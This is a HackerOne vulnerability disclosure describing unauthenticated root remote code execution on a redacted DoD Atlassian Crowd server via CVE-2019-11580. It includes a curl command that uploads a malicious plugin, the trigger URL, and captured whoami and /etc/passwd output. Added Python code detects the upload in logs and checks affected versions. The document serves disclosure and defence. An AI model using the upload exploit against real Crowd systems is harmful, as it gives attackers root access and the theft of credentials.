U.S. Dept Of Defense: Root Remote Code Execution on https://███

HackerOne report #632721 by cdl (hackerone.com), 2019-06-30 03:11:39
EPSS: 0.974 (99.9th percentile)

Summary:
Atlassian Crowd is a centralized identity management application that allows companies to “Manage users from multiple directories - Active Directory, LDAP, OpenLDAP or Microsoft Azure AD - and control application authentication permissions in one single location.”

A DoD Atlassian Crowd installation is vulnerable to remote code execution because CVE-2019-11580 has not been patched.

Description:
From Atlassian’s public advisory:

> Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.

There is no public proof-of-concept for this vulnerability; however, I spent a good amount of time reverse-engineering the “pdkinstall” plugin and I was able to successfully construct a working exploit.

Step-by-step Reproduction Instructions

  1. Download and unzip my malicious plugin: rce-plugin.zip {F519371}
  2. cd into the directory
  3. Run the following command:
curl -k -H "Content-Type: multipart/content" \
  --form "[email protected];type=application/octet-stream" https://███/crowd/admin/uploadplugin.action

You’ll see that the malicious plugin is successfully installed:

Installed plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-2906099909159442588rce.jar

Now visit https://███████/crowd/plugins/servlet/hackerone-cdl, which invokes my malicious plugin. The plugin executes the command whoami, which returns root:

██████████

Contents of /etc/passwd:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
████████x:6:0:██████████/sbin:/sbin/shutdown
██████x:7:0:███████/sbin:/sbin/halt
█████████x:8:12:█████/var/spool/████/sbin/nologin
███x:10:14:███/var/spool/███████/sbin/nologin
██████x:11:0:██████/root:/sbin/nologin
██████████x:12:100:███████/usr/████/sbin/nologin
██████████x:13:30:█████/var/█████/sbin/nologin
████x:14:50:FTP User:/var/███████/sbin/nologin
█████████x:99:99:Nobody:/:/sbin/nologin
██████████x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
██████████x:38:38::/etc/██████/sbin/nologin
██████████x:499:76:"Saslauthd user":/var/empty/██████████/sbin/nologin
██████████x:47:47::/var/spool/mqueue:/sbin/nologin
███████x:51:51::/var/spool/mqueue:/sbin/nologin
████████x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
█████x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
████████x:74:74:Privilege-separated SSH:/var/empty/████████/sbin/nologin
████████x:81:81:System message bus:/:/sbin/nologin
███████x:500:500:EC2 Default User:/home/████████/bin/bash
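The reproduction above leaves two traces a defender can look for: a request to /crowd/admin/uploadplugin.action (the pdkinstall endpoint, which should not exist on a production Crowd at all) followed by a request to a newly appeared path under /crowd/plugins/servlet/, and a JAR written to Tomcat's temp directory with the plugindev- prefix. The following is an added detection example, not code from the report or from Atlassian; the log lines are constructed in Tomcat's default access-log format, and the assumption that the number in the plugindev- file name is a random temp-file component is an inference from the single path shown above.

```python
import re
from collections import defaultdict

# Constructed sample lines in Tomcat's default access-log format
# (%h %l %u %t "%r" %s %b); they are not from the report.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Jun/2019:23:58:01 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 200 113
10.0.0.5 - - [29/Jun/2019:23:58:07 +0000] "GET /crowd/plugins/servlet/hackerone-cdl HTTP/1.1" 200 512
192.0.2.10 - - [30/Jun/2019:00:01:15 +0000] "GET /crowd/console/login.action HTTP/1.1" 200 8912
192.0.2.10 - - [30/Jun/2019:00:01:20 +0000] "POST /crowd/console/login.action HTTP/1.1" 302 -
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+$'
)

UPLOAD_PATH = "/crowd/admin/uploadplugin.action"
SERVLET_PREFIX = "/crowd/plugins/servlet/"


def parse(log_text):
    """Yield one dict per parseable line; lines in another format are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def find_plugin_uploads(log_text):
    """Every request to the pdkinstall upload endpoint. The plugin should not be
    present on a production Crowd, so any hit is worth triage regardless of
    method or status code (a 404 still tells you someone is probing for it)."""
    return [r for r in parse(log_text) if r["path"].split("?")[0] == UPLOAD_PATH]


def followup_servlet_requests(log_text):
    """Map each client that hit the upload endpoint to the plugin servlets it
    requested afterwards. In the report the attacker uploads rce.jar and then
    requests /crowd/plugins/servlet/hackerone-cdl to trigger it, so a servlet
    name you have never seen before, right after an upload, is the strongest
    sign that the upload succeeded. Lines are assumed to be in time order."""
    uploaded = set()
    hits = defaultdict(list)
    for r in parse(log_text):
        path = r["path"].split("?")[0]
        if path == UPLOAD_PATH:
            uploaded.add(r["ip"])
        elif r["ip"] in uploaded and path.startswith(SERVLET_PREFIX):
            hits[r["ip"]].append(path)
    return dict(hits)


# Host-side indicator. The report shows the installed plugin written to
# Tomcat's temp dir as plugindev-2906099909159442588rce.jar; the digits are
# assumed to be a random per-upload component, so only the prefix, the digit
# run and the .jar extension are matched.
PLUGINDEV_RE = re.compile(r"^plugindev-\d+.*\.jar$")


def is_plugindev_artifact(filename):
    """True for files named like the plugin the pdkinstall upload left behind."""
    return PLUGINDEV_RE.match(filename) is not None


if __name__ == "__main__":
    for r in find_plugin_uploads(SAMPLE_LOG):
        print(f"upload endpoint hit by {r['ip']} at {r['ts']} (HTTP {r['status']})")
    for ip, paths in followup_servlet_requests(SAMPLE_LOG).items():
        print(f"{ip} then requested plugin servlets: {paths}")
```

Run it against the real access log (apache-tomcat/logs/) and the contents of apache-tomcat/temp/ on the Crowd host; the servlet path the attacker chooses is arbitrary, so the correlation by client address matters more than the specific name seen here.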

Product, Version, and Configuration (If applicable)

Crowd or Crowd Data Center from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x)
Crowd or Crowd Data Center from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x)
Crowd or Crowd Data Center from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x)
Crowd or Crowd Data Center from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x)
Crowd or Crowd Data Center from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x)
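The ranges above are half-open: each branch is affected from its first listed release up to, but not including, its fixed release, and the 3.0.x line starts all the way back at 2.1.0. Checking a version string against them by hand is error-prone, so here is an added example (not code from the report or from Atlassian) that encodes the table and reports whether a given version is in an affected range and which fix applies. A version that falls between two listed ranges (for instance a hypothetical 3.0.6) is treated as not affected, since it is at or above the fix for its branch.

```python
import re

# Affected ranges from the advisory text above, as (first affected, first fixed).
# The first entry starts at 2.1.0 because the advisory lists 2.1.0 as the start
# of the range fixed in 3.0.5.
AFFECTED_RANGES = [
    ((2, 1, 0), (3, 0, 5)),
    ((3, 1, 0), (3, 1, 6)),
    ((3, 2, 0), (3, 2, 8)),
    ((3, 3, 0), (3, 3, 5)),
    ((3, 4, 0), (3, 4, 4)),
]


def parse_version(version):
    """Turn '3.4.3' or '3.4.3-SNAPSHOT' into (3, 4, 3); missing parts are zero."""
    m = re.match(r"^\s*(\d+)(?:\.(\d+))?(?:\.(\d+))?", version)
    if not m:
        raise ValueError(f"not a Crowd version string: {version!r}")
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def affected_range(version):
    """Return the (first affected, first fixed) pair covering the version, or
    None when the version lies outside every listed range."""
    v = parse_version(version)
    for lo, hi in AFFECTED_RANGES:
        if lo <= v < hi:  # tuple comparison is lexicographic, so 3.0.4 < 3.0.5
            return (lo, hi)
    return None


def is_vulnerable(version):
    """True if the version is inside one of the advisory's affected ranges."""
    return affected_range(version) is not None


def fixed_version_for(version):
    """The fixed release for the branch a vulnerable version is on, as a string,
    or None if the version is not affected."""
    r = affected_range(version)
    return None if r is None else ".".join(map(str, r[1]))


if __name__ == "__main__":
    for v in ["2.1.0", "3.0.4", "3.0.5", "3.3.2", "3.4.3-SNAPSHOT", "3.4.4"]:
        print(f"{v:16} vulnerable={is_vulnerable(v)!s:5} fix={fixed_version_for(v)}")
```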

Suggested Mitigation/Remediation Actions

I recommend updating to the latest version of Atlassian Crowd, but if that’s not possible, follow mitigation options in the advisory.

Impact

Remote code execution on https://███. An attacker could exploit this vulnerability to pivot into NIPRNet and gain access to other applications. Since Atlassian Crowd is an Identity management / Single Sign-on application, an attacker could exploit this vulnerability to gain access to any applications using Crowd for sign-ons.

Since Crowd is running as root, an attacker could also easily backdoor the login page and steal credentials.

Thanks,
Corben Leo (@cdl)